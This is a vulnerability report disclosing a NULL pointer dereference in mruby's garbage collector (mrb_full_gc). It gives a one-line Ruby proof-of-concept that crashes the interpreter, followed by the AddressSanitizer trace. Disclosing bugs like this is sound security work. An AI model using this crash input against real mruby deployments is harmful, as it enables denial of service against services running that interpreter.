NULL Pointer Dereference in mruby/mruby
Valid
Reported on Oct 8th 2021
Description
NULL Pointer Dereference on mrb_full_gc
Proof of Concept
# PoC (crash.rb)
def lambda = super { } [lambda] = @a ... ; lambda
Result
~/asan/mruby/bin/mruby crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==354==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556c5e8ddf2f bp 0x7ffe9a8ca4a0 sp 0x7ffe9a8ca480 T0)
==354==The signal is caused by a READ memory access.
==354==Hint: address points to the zero page.
#0 0x556c5e8ddf2e in mrb_full_gc /root/asan/mruby/src/gc.c:1325
#1 0x556c5e8de256 in mrb_garbage_collect /root/asan/mruby/src/gc.c:1358
#2 0x556c5e8b58c7 in mrb_irep_incref /root/asan/mruby/src/state.c:114
#3 0x556c5e965fd1 in mrb_proc_copy /root/asan/mruby/src/proc.c:212
#4 0x556c5e966929 in proc_lambda /root/asan/mruby/src/proc.c:283
#5 0x556c5e91fbb7 in mrb_vm_exec /root/asan/mruby/src/vm.c:1725
#6 0x556c5e9112fb in mrb_vm_run /root/asan/mruby/src/vm.c:1032
#7 0x556c5e9534d1 in mrb_top_run /root/asan/mruby/src/vm.c:2998
#8 0x556c5e9ad4a0 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6891
#9 0x556c5e9ad78e in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6934
#10 0x556c5e8b5092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
#11 0x7fd1ded600b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#12 0x556c5e8b242d in _start (/root/asan/mruby/bin/mruby+0xbd42d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/gc.c:1325 in mrb_full_gc
==354==ABORTING
We have contacted a member of the mruby team and are waiting to hear back